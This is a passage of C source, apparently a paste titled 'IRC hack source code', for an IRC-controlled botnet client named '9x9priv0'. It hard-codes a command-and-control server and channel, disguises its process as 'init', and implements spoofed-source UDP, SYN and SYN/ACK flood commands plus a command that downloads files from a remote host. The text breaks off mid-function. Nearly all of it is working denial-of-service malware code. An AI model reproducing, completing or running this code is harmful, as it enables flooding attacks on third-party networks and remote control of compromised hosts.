IRC hack source code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /****************************** | |
| * * | |
| * 9x9priv0 v1.2 by 9x9team * | |
| * * | |
| *******************************/ | |
| #define STARTUP | |
| #undef IDENT | |
| #define FAKENAME "init" | |
| #define CHAN "##Hax" | |
| #define KEY "gayr0x" | |
| int numservers=1; | |
| char *servers[] = { | |
| "anal.dnsdynamic.net", | |
| (void*)0 | |
| }; | |
| #include <stdarg.h> | |
| #include <errno.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| #include <strings.h> | |
| #include <netinet/in.h> | |
| #include <unistd.h> | |
| #include <sys/time.h> | |
| #include <sys/socket.h> | |
| #include <signal.h> | |
| #include <arpa/inet.h> | |
| #include <netdb.h> | |
| #include <time.h> | |
| #include <sys/wait.h> | |
| #include <sys/ioctl.h> | |
| int sock,changeservers=0; | |
| char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256]; | |
| unsigned int *pids; | |
| unsigned long spoofs=0, spoofsm=0, numpids=0; | |
| int strwildmatch(const char* pattern, const char* string) { | |
| switch(*pattern) { | |
| case '\0': return *string; | |
| case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1)); | |
| case '?': return !(*string && !strwildmatch(pattern+1, string+1)); | |
| default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1)); | |
| } | |
| } | |
| int Send(int sock, char *words, ...) { | |
| static char textBuffer[1024]; | |
| va_list args; | |
| va_start(args, words); | |
| vsprintf(textBuffer, words, args); | |
| va_end(args); | |
| return write(sock,textBuffer,strlen(textBuffer)); | |
| } | |
| int mfork(char *sender) { | |
| unsigned int parent, *newpids, i; | |
| if (disabled == 1) { | |
| Send(sock,"NOTICE %s :Unable to comply.\n",sender); | |
| return 1; | |
| } | |
| parent=fork(); | |
| if (parent <= 0) return parent; | |
| numpids++; | |
| newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); | |
| for (i=0;i<numpids-1;i++) newpids[i]=pids[i]; | |
| newpids[numpids-1]=parent; | |
| free(pids); | |
| pids=newpids; | |
| return parent; | |
| } | |
| unsigned long getspoof() { | |
| if (!spoofs) return rand(); | |
| if (spoofsm == 1) return ntohl(spoofs); | |
| return ntohl(spoofs+(rand() % spoofsm)+1); | |
| } | |
| void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; } | |
| char *makestring() { | |
| char *tmp; | |
| int len=(rand()%5)+4,i; | |
| FILE *file; | |
| tmp=(char*)malloc(len+1); | |
| memset(tmp,0,len+1); | |
| if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65; | |
| else { | |
| int a=((rand()*rand())%45402)+1; | |
| char buf[1024]; | |
| for (i=0;i<a;i++) fgets(buf,1024,file); | |
| memset(buf,0,1024); | |
| fgets(buf,1024,file); | |
| filter(buf); | |
| memcpy(tmp,buf,len); | |
| fclose(file); | |
| } | |
| return tmp; | |
| } | |
| void identd() { | |
| int sockname,sockfd,sin_size,tmpsock,i; | |
| struct sockaddr_in my_addr,their_addr; | |
| char szBuffer[1024]; | |
| if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return; | |
| my_addr.sin_family = AF_INET; | |
| my_addr.sin_port = htons(113); | |
| my_addr.sin_addr.s_addr = INADDR_ANY; | |
| memset(&(my_addr.sin_zero), 0, 8); | |
| if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return; | |
| if (listen(sockfd, 1) == -1) return; | |
| if (fork() == 0) return; | |
| sin_size = sizeof(struct sockaddr_in); | |
| if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0); | |
| for(;;) { | |
| fd_set bla; | |
| struct timeval timee; | |
| FD_ZERO(&bla); | |
| FD_SET(tmpsock,&bla); | |
| timee.tv_sec=timee.tv_usec=60; | |
| if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0); | |
| if (FD_ISSET(tmpsock,&bla)) break; | |
| } | |
| i = recv(tmpsock,szBuffer,1024,0); | |
| if (i <= 0 || i >= 20) exit(0); | |
| szBuffer[i]=0; | |
| if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0; | |
| if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0; | |
| Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident); | |
| close(tmpsock); | |
| close(sockfd); | |
| exit(0); | |
| } | |
| long pow(long a, long b) { | |
| if (b == 0) return 1; | |
| if (b == 1) return a; | |
| return a*pow(a,b-1); | |
| } | |
| u_short in_cksum(u_short *addr, int len) { | |
| register int nleft = len; | |
| register u_short *w = addr; | |
| register int sum = 0; | |
| u_short answer =0; | |
| while (nleft > 1) { | |
| sum += *w++; | |
| nleft -= 2; | |
| } | |
| if (nleft == 1) { | |
| *(u_char *)(&answer) = *(u_char *)w; | |
| sum += answer; | |
| } | |
| sum = (sum >> 16) + (sum & 0xffff); | |
| sum += (sum >> 16); | |
| answer = ~sum; | |
| return(answer); | |
| } | |
| void get(int sock, char *sender, int argc, char **argv) { | |
| int sock2,i,d; | |
| struct sockaddr_in server; | |
| unsigned long ipaddr; | |
| char buf[1024]; | |
| FILE *file; | |
| unsigned char bufm[4096]; | |
| if (mfork(sender) != 0) return; | |
| if (argc < 2) { | |
| Send(sock,"NOTICE %s :GET <host> <save as>\n",sender); | |
| exit(0); | |
| } | |
| if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) { | |
| Send(sock,"NOTICE %s :Unable to create socket.\n",sender); | |
| exit(0); | |
| } | |
| if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7); | |
| else strcpy(buf,argv[1]); | |
| for (i=0;i<strlen(buf) && buf[i] != '/';i++); | |
| buf[i]=0; | |
| server.sin_family = AF_INET; | |
| server.sin_port = htons(22); | |
| if ((ipaddr = inet_addr(buf)) == -1) { | |
| struct hostent *hostm; | |
| if ((hostm=gethostbyname(buf)) == NULL) { | |
| Send(sock,"NOTICE %s :Unable to resolve address.\n",sender); | |
| exit(0); | |
| } | |
| memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); | |
| } | |
| else server.sin_addr.s_addr = ipaddr; | |
| memset(&(server.sin_zero), 0, 8); | |
| if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) { | |
| Send(sock,"NOTICE %s :Unable to connect to http.\n",sender); | |
| exit(0); | |
| } | |
| Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf); | |
| Send(sock,"NOTICE %s :Receiving file.\n",sender); | |
| file=fopen(argv[2],"wb"); | |
| while(1) { | |
| int i; | |
| if ((i=recv(sock2,bufm,4096,0)) <= 0) break; | |
| if (i < 4096) bufm[i]=0; | |
| for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) { | |
| for (d+=4;d<i;d++) fputc(bufm[d],file); | |
| goto done; | |
| } | |
| } | |
| done: | |
| Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]); | |
| while(1) { | |
| int i,d; | |
| if ((i=recv(sock2,bufm,4096,0)) <= 0) break; | |
| if (i < 4096) bufm[i]=0; | |
| for (d=0;d<i;d++) fputc(bufm[d],file); | |
| } | |
| fclose(file); | |
| close(sock2); | |
| exit(0); | |
| } | |
| void getspoofs(int sock, char *sender, int argc, char **argv) { | |
| unsigned long a=spoofs,b=spoofs+(spoofsm-1); | |
| if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]); | |
| else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]); | |
| } | |
| void version(int sock, char *sender, int argc, char **argv) { | |
| Send(sock,"NOTICE %s :9x9 priv0 1.2\n",sender); | |
| } | |
| void nickc(int sock, char *sender, int argc, char **argv) { | |
| if (argc != 1) { | |
| Send(sock,"NOTICE %s :NICK <nick>\n",sender); | |
| return; | |
| } | |
| if (strlen(argv[1]) >= 10) { | |
| Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender); | |
| return; | |
| } | |
| Send(sock,"NICK %s\n",argv[1]); | |
| } | |
| void spoof(int sock, char *sender, int argc, char **argv) { | |
| char ip[256]; | |
| int i, num; | |
| unsigned long uip; | |
| if (argc != 1) { | |
| Send(sock,"NOTICE %s :Removed all spoofs\n",sender); | |
| spoofs=0; | |
| spoofsm=0; | |
| return; | |
| } | |
| if (strlen(argv[1]) > 16) { | |
| Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender); | |
| return; | |
| } | |
| strcpy(ip,argv[1]); | |
| if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0; | |
| for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++; | |
| num=-(num-4); | |
| for (i=0;i<num;i++) strcat(ip,".0"); | |
| uip=inet_network(ip); | |
| if (num == 0) spoofsm=1; | |
| else spoofsm=pow(256,num); | |
| spoofs=uip; | |
| } | |
| struct iphdr { | |
| unsigned int ihl:4, version:4; | |
| unsigned char tos; | |
| unsigned short tot_len; | |
| unsigned short id; | |
| unsigned short frag_off; | |
| unsigned char ttl; | |
| unsigned char protocol; | |
| unsigned short check; | |
| unsigned long saddr; | |
| unsigned long daddr; | |
| }; | |
| struct udphdr { | |
| unsigned short source; | |
| unsigned short dest; | |
| unsigned short len; | |
| unsigned short check; | |
| }; | |
| struct tcphdr { | |
| unsigned short source; | |
| unsigned short dest; | |
| unsigned long seq; | |
| unsigned long ack_seq; | |
| unsigned short res1:4, doff:4; | |
| unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1; | |
| unsigned short window; | |
| unsigned short check; | |
| unsigned short urg_ptr; | |
| }; | |
| struct send_tcp { | |
| struct iphdr ip; | |
| struct tcphdr tcp; | |
| char buf[20]; | |
| }; | |
| struct pseudo_header { | |
| unsigned int source_address; | |
| unsigned int dest_address; | |
| unsigned char placeholder; | |
| unsigned char protocol; | |
| unsigned short tcp_length; | |
| struct tcphdr tcp; | |
| char buf[20]; | |
| }; | |
| unsigned int host2ip(char *sender,char *hostname) { | |
| static struct in_addr i; | |
| struct hostent *h; | |
| if((i.s_addr = inet_addr(hostname)) == -1) { | |
| if((h = gethostbyname(hostname)) == NULL) { | |
| Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname); | |
| exit(0); | |
| } | |
| bcopy(h->h_addr, (char *)&i.s_addr, h->h_length); | |
| } | |
| return i.s_addr; | |
| } | |
| void udp(int sock, char *sender, int argc, char **argv) { | |
| unsigned int port,i=0; | |
| unsigned long psize,target,secs; | |
| struct sockaddr_in s_in; | |
| struct iphdr *ip; | |
| struct udphdr *udp; | |
| char buf[1500],*str; | |
| int get; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| if (argc < 3) { | |
| Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender); | |
| exit(1); | |
| } | |
| target = host2ip(sender,argv[1]); | |
| port = atoi(argv[2]); | |
| secs = atol(argv[3]); | |
| ip=(void*)buf; | |
| udp=(void*)(buf+sizeof(struct iphdr)); | |
| str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr)); | |
| memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr))); | |
| Send(sock,"NOTICE %s :UDP Packeting %s.\n",sender,argv[1]); | |
| ip->ihl = 5; | |
| ip->version = 4; | |
| ip->tos = 0; | |
| ip->tot_len = 1500; | |
| ip->frag_off = 0; | |
| ip->protocol = 17; | |
| ip->ttl = 64; | |
| ip->daddr = target; | |
| udp->len = htons(psize); | |
| s_in.sin_family = AF_INET; | |
| s_in.sin_addr.s_addr = target; | |
| for (;;) { | |
| udp->source = rand(); | |
| if (port) udp->dest = htons(port); | |
| else udp->dest = rand(); | |
| udp->check = in_cksum((u_short *)buf,1500); | |
| ip->saddr = getspoof(); | |
| ip->id = rand(); | |
| ip->check = in_cksum((u_short *)buf,1500); | |
| s_in.sin_port = udp->dest; | |
| sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in)); | |
| if (i >= 50) { | |
| if (time(NULL) >= start+secs) exit(0); | |
| i=0; | |
| } | |
| i++; | |
| } | |
| } | |
| void pan(int sock, char *sender, int argc, char **argv) { | |
| struct send_tcp send_tcp; | |
| struct pseudo_header pseudo_header; | |
| struct sockaddr_in sin; | |
| unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0; | |
| unsigned int psize=20, source, dest, check; | |
| unsigned long saddr, daddr,secs; | |
| int get; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 3) { | |
| Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender); | |
| exit(1); | |
| } | |
| if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];} | |
| daddr=host2ip(sender,argv[1]); | |
| secs=atol(argv[3]); | |
| Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]); | |
| send_tcp.ip.ihl = 5; | |
| send_tcp.ip.version = 4; | |
| send_tcp.ip.tos = 16; | |
| send_tcp.ip.frag_off = 64; | |
| send_tcp.ip.ttl = 64; | |
| send_tcp.ip.protocol = 6; | |
| send_tcp.tcp.ack_seq = 0; | |
| send_tcp.tcp.doff = 10; | |
| send_tcp.tcp.res1 = 0; | |
| send_tcp.tcp.cwr = 0; | |
| send_tcp.tcp.ece = 0; | |
| send_tcp.tcp.urg = 0; | |
| send_tcp.tcp.ack = 0; | |
| send_tcp.tcp.psh = 0; | |
| send_tcp.tcp.rst = 0; | |
| send_tcp.tcp.fin = 0; | |
| send_tcp.tcp.syn = 1; | |
| send_tcp.tcp.window = 30845; | |
| send_tcp.tcp.urg_ptr = 0; | |
| dest=htons(atoi(argv[2])); | |
| while(1) { | |
| source=rand(); | |
| if (atoi(argv[2]) == 0) dest=rand(); | |
| saddr=getspoof(); | |
| send_tcp.ip.tot_len = htons(40+psize); | |
| send_tcp.ip.id = rand(); | |
| send_tcp.ip.saddr = saddr; | |
| send_tcp.ip.daddr = daddr; | |
| send_tcp.ip.check = 0; | |
| send_tcp.tcp.source = source; | |
| send_tcp.tcp.dest = dest; | |
| send_tcp.tcp.seq = rand(); | |
| send_tcp.tcp.check = 0; | |
| sin.sin_family = AF_INET; | |
| sin.sin_port = dest; | |
| sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| check = rand(); | |
| send_tcp.buf[9]=((char*)&check)[0]; | |
| send_tcp.buf[10]=((char*)&check)[1]; | |
| send_tcp.buf[11]=((char*)&check)[2]; | |
| send_tcp.buf[12]=((char*)&check)[3]; | |
| pseudo_header.source_address = send_tcp.ip.saddr; | |
| pseudo_header.dest_address = send_tcp.ip.daddr; | |
| pseudo_header.placeholder = 0; | |
| pseudo_header.protocol = IPPROTO_TCP; | |
| pseudo_header.tcp_length = htons(20+psize); | |
| bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| if (a >= 50) { | |
| if (time(NULL) >= start+secs) exit(0); | |
| a=0; | |
| } | |
| a++; | |
| } | |
| close(get); | |
| exit(0); | |
| } | |
| void mra(int sock, char *sender, int argc, char **argv) { | |
| int flag=1,fd,i; | |
| unsigned long secs; | |
| char *buf=(char*)malloc(128); | |
| struct hostent *hp; | |
| struct sockaddr_in in; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 2) { | |
| Send(sock,"NOTICE %s :MRA <target> <secs>\n",sender); | |
| exit(1); | |
| } | |
| secs=atol(argv[2]); | |
| memset((void*)&in,0,sizeof(struct sockaddr_in)); | |
| in.sin_addr.s_addr=host2ip(sender,argv[1]); | |
| in.sin_family = AF_INET; | |
| Send(sock,"NOTICE %s :Mraring %s.\n",sender,argv[1]); | |
| while(1) { | |
| in.sin_port = rand(); | |
| if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); | |
| else { | |
| flag=1; | |
| ioctl(fd,FIONBIO,&flag); | |
| sendto(fd,buf,128,0,(struct sockaddr*)&in,sizeof(in)); | |
| close(fd); | |
| } | |
| if (i >= 50) { | |
| if (time(NULL) >= start+secs) break; | |
| i=0; | |
| } | |
| i++; | |
| } | |
| close(fd); | |
| exit(0); | |
| } | |
| void mix(int sock, char *sender, int argc, char **argv) { | |
| struct send_tcp send_tcp; | |
| struct pseudo_header pseudo_header; | |
| struct sockaddr_in sin; | |
| unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0; | |
| unsigned int psize=20, source, dest, check; | |
| unsigned long saddr, daddr,secs; | |
| int get; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 3) { | |
| Send(sock,"NOTICE %s :MIX <target> <port> <secs>\n",sender); | |
| exit(1); | |
| } | |
| if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];} | |
| daddr=host2ip(sender,argv[1]); | |
| secs=atol(argv[3]); | |
| dest=htons(atoi(argv[2])); | |
| Send(sock,"NOTICE %s :Mixing TCP SYN/ACK %s.\n",sender,argv[1]); | |
| send_tcp.ip.ihl = 5; | |
| send_tcp.ip.version = 4; | |
| send_tcp.ip.tos = 16; | |
| send_tcp.ip.frag_off = 64; | |
| send_tcp.ip.ttl = 255; | |
| send_tcp.ip.protocol = 6; | |
| send_tcp.tcp.doff = 5; | |
| send_tcp.tcp.res1 = 0; | |
| send_tcp.tcp.cwr = 0; | |
| send_tcp.tcp.ece = 0; | |
| send_tcp.tcp.urg = 0; | |
| send_tcp.tcp.ack = 1; | |
| send_tcp.tcp.psh = 0; | |
| send_tcp.tcp.rst = 0; | |
| send_tcp.tcp.fin = 0; | |
| send_tcp.tcp.syn = 1; | |
| send_tcp.tcp.window = 30845; | |
| send_tcp.tcp.urg_ptr = 0; | |
| while(1) { | |
| saddr=getspoof(); | |
| if (atoi(argv[2]) == 0) dest=rand(); | |
| send_tcp.ip.tot_len = htons(40+psize); | |
| send_tcp.ip.id = rand(); | |
| send_tcp.ip.check = 0; | |
| send_tcp.ip.saddr = saddr; | |
| send_tcp.ip.daddr = daddr; | |
| send_tcp.tcp.source = rand(); | |
| send_tcp.tcp.dest = dest; | |
| send_tcp.tcp.seq = rand(); | |
| send_tcp.tcp.ack_seq = rand(); | |
| send_tcp.tcp.check = 0; | |
| sin.sin_family = AF_INET; | |
| sin.sin_port = send_tcp.tcp.dest; | |
| sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| check = in_cksum((unsigned short *)&send_tcp, 40); | |
| pseudo_header.source_address = send_tcp.ip.saddr; | |
| pseudo_header.dest_address = send_tcp.ip.daddr; | |
| pseudo_header.placeholder = 0; | |
| pseudo_header.protocol = IPPROTO_TCP; | |
| pseudo_header.tcp_length = htons(20+psize); | |
| bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| if (a >= 50) { | |
| if (time(NULL) >= start+secs) exit(0); | |
| a=0; | |
| } | |
| a++; | |
| } | |
| close(get); | |
| exit(0); | |
| } | |
| void syn(int sock, char *sender, int argc, char **argv) { | |
| struct send_tcp send_tcp; | |
| struct pseudo_header pseudo_header; | |
| struct sockaddr_in sin; | |
| unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0; | |
| unsigned int psize=20, source, dest, check; | |
| unsigned long saddr, daddr,secs; | |
| int get; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 3) { | |
| Send(sock,"NOTICE %s :SYN <target> <port> <secs>\n",sender); | |
| exit(1); | |
| } | |
| if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];} | |
| daddr=host2ip(sender,argv[1]); | |
| secs=atol(argv[3]); | |
| Send(sock,"NOTICE %s :Syning with TCP SYN %s.\n",sender,argv[1]); | |
| send_tcp.ip.ihl = 5; | |
| send_tcp.ip.version = 4; | |
| send_tcp.ip.tos = 16; | |
| send_tcp.ip.frag_off = 64; | |
| send_tcp.ip.ttl = 64; | |
| send_tcp.ip.protocol = 6; | |
| send_tcp.tcp.ack_seq = 0; | |
| send_tcp.tcp.doff = 10; | |
| send_tcp.tcp.res1 = 0; | |
| send_tcp.tcp.cwr = 0; | |
| send_tcp.tcp.ece = 0; | |
| send_tcp.tcp.urg = 0; | |
| send_tcp.tcp.ack = 0; | |
| send_tcp.tcp.psh = 0; | |
| send_tcp.tcp.rst = 0; | |
| send_tcp.tcp.fin = 0; | |
| send_tcp.tcp.syn = 1; | |
| send_tcp.tcp.window = 30845; | |
| send_tcp.tcp.urg_ptr = 0; | |
| dest=htons(atoi(argv[2])); | |
| while(1) { | |
| source=rand(); | |
| if (atoi(argv[2]) == 0) dest=rand(); | |
| saddr=getspoof(); | |
| send_tcp.ip.tot_len = htons(40+psize); | |
| send_tcp.ip.id = rand(); | |
| send_tcp.ip.saddr = saddr; | |
| send_tcp.ip.daddr = daddr; | |
| send_tcp.ip.check = 0; | |
| send_tcp.tcp.source = source; | |
| send_tcp.tcp.dest = dest; | |
| send_tcp.tcp.seq = rand(); | |
| send_tcp.tcp.check = 0; | |
| sin.sin_family = AF_INET; | |
| sin.sin_port = dest; | |
| sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| check = rand(); | |
| send_tcp.buf[9]=((char*)&check)[0]; | |
| send_tcp.buf[10]=((char*)&check)[1]; | |
| send_tcp.buf[11]=((char*)&check)[2]; | |
| send_tcp.buf[12]=((char*)&check)[3]; | |
| pseudo_header.source_address = send_tcp.ip.saddr; | |
| pseudo_header.dest_address = send_tcp.ip.daddr; | |
| pseudo_header.placeholder = 0; | |
| pseudo_header.protocol = IPPROTO_TCP; | |
| pseudo_header.tcp_length = htons(20+psize); | |
| bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| if (a >= 50) { | |
| if (time(NULL) >= start+secs) exit(0); | |
| a=0; | |
| } | |
| a++; | |
| } | |
| close(get); | |
| exit(0); | |
| } | |
| void x9syn(int sock, char *sender, int argc, char **argv) { | |
| int flag=1,fd,i; | |
| unsigned long secs; | |
| char *buf=(char*)malloc(9216); | |
| struct hostent *hp; | |
| struct sockaddr_in in; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 2) { | |
| Send(sock,"NOTICE %s :X9SYN <target> <secs>\n",sender); | |
| exit(1); | |
| } | |
| secs=atol(argv[2]); | |
| memset((void*)&in,0,sizeof(struct sockaddr_in)); | |
| in.sin_addr.s_addr=host2ip(sender,argv[1]); | |
| in.sin_family = AF_INET; | |
| Send(sock,"NOTICE %s :Initated x9syn-Flood on %s. [9216byte] bufferfly \n",sender,argv[1]); | |
| while(1) { | |
| in.sin_port = rand(); | |
| if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); | |
| else { | |
| flag=1; | |
| ioctl(fd,FIONBIO,&flag); | |
| sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in)); | |
| close(fd); | |
| } | |
| if (i >= 50) { | |
| if (time(NULL) >= start+secs) break; | |
| i=0; | |
| } | |
| i++; | |
| } | |
| close(fd); | |
| exit(0); | |
| } | |
| void x9synx(int sock, char *sender, int argc, char **argv) { | |
| int flag=1,fd,i; | |
| unsigned long secs; | |
| char *buf=(char*)malloc(100000); | |
| struct hostent *hp; | |
| struct sockaddr_in in; | |
| time_t start=time(NULL); | |
| if (mfork(sender) != 0) return; | |
| if (argc < 2) { | |
| Send(sock,"NOTICE %s :X9SYNX <target> <secs>\n",sender); | |
| exit(1); | |
| } | |
| secs=atol(argv[2]); | |
| memset((void*)&in,0,sizeof(struct sockaddr_in)); | |
| in.sin_addr.s_addr=host2ip(sender,argv[1]); | |
| in.sin_family = AF_INET; | |
| Send(sock,"NOTICE %s :Initated x9synx-Flood on %s. [100000byte] bufferfly \n",sender,argv[1]); | |
| while(1) { | |
| in.sin_port = rand(); | |
| if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); | |
| else { | |
| flag=1; | |
| ioctl(fd,FIONBIO,&flag); | |
| sendto(fd,buf,100000,0,(struct sockaddr*)&in,sizeof(in)); | |
| close(fd); | |
| } | |
| if (i >= 50) { | |
| if (time(NULL) >= start+secs) break; | |
| i=0; | |
| } | |
| i++; | |
| } | |
| close(fd); | |
| exit(0); | |
| } | |
| void petarda(int sock, char *sender, int argc, char **argv) { | |
| if (argc != 1) { | |
| Send(sock,"NOTICE %s :DISABLE <pass>\n",sender); | |
| Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); | |
| return; | |
| } | |
| if (disabled) { | |
| Send(sock,"NOTICE %s :Already disabled.\n",sender); | |
| return; | |
| } | |
| if (strlen(argv[1]) > 254) { | |
| Send(sock,"NOTICE %s :Password too long! > 254\n",sender); | |
| return; | |
| } | |
| disabled=1; | |
| memset(dispass,0,256); | |
| strcpy(dispass,argv[1]); | |
| Send(sock,"NOTICE %s :Disable sucessful.\n"); | |
| } | |
| void enable(int sock, char *sender, int argc, char **argv) { | |
| if (argc != 1) { | |
| Send(sock,"NOTICE %s :ENABLE <pass>\n",sender); | |
| Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); | |
| return; | |
| } | |
| if (!disabled) { | |
| Send(sock,"NOTICE %s :Already enabled.\n",sender); | |
| return; | |
| } | |
| if (strcasecmp(dispass,argv[1])) { | |
| Send(sock,"NOTICE %s :Wrong password\n",sender); | |
| return; | |
| } | |
| disabled=0; | |
| Send(sock,"NOTICE %s :Password correct.\n",sender); | |
| } | |
| void move(int sock, char *sender, int argc, char **argv) { | |
| if (argc < 1) { | |
| Send(sock,"NOTICE %s :MOVE <server>\n",sender); | |
| exit(1); | |
| } | |
| server=strdup(argv[1]); | |
| changeservers=1; | |
| close(sock); | |
| } | |
| void killall(int sock, char *sender, int argc, char **argv) { | |
| unsigned long i; | |
| for (i=0;i<numpids;i++) { | |
| if (pids[i] != 0 && pids[i] != getpid()) { | |
| if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]); | |
| kill(pids[i],9); | |
| } | |
| } | |
| } | |
| void fuckoff2(int sock, char *sender, int argc, char **argv) { | |
| if (!petarda) kill(0,9); | |
| else Send(sock,"NOTICE %s :Unable to comply.\n"); | |
| } | |
| struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = { | |
| { "MIX", mix }, | |
| { "PAN", pan }, | |
| { "UDP", udp }, | |
| { "SYN", syn }, | |
| { "MRA", mra }, | |
| { "X9SYN", x9syn }, | |
| { "X9SYNX", x9synx }, | |
| { "FUCKOFF2", fuckoff2 }, | |
| { "PETARDA", petarda }, | |
| { "ENABLE", enable }, | |
| { "NICK", nickc }, | |
| { "SERVER", move }, | |
| { "GETSPOOFS", getspoofs }, | |
| { "SPOOFS", spoof }, | |
| { "GET", get }, | |
| { "VERSION", version }, | |
| { "KILLALL", killall }, | |
| { (char *)0, (void (*)(int,char *,int,char **))0 } }; | |
| void _PRIVMSG(int sock, char *sender, char *str) { | |
